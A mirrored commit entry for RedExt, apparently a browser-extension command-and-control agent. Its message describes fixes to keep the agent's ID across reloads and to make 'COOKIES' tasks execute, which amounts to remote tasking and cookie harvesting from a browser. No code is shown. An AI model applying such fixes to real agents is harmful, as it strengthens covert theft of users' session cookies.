mirror of
https://github.com/Darkrain2009/RedExt
synced 2026-06-08 10:50:40 +00:00
0f1ec5f119
Two bugs fixed in background.js: 1. onInstalled now checks storage for an existing agent_id before registering a new one. Previously, every extension reload/update created a fresh agent_id, leaving all previously-assigned tasks pending forever since the agent was polling with a different id. 2. Added 'cookies' as an alias for 'getcookies' in handleCommand so COOKIES tasks are actually executed.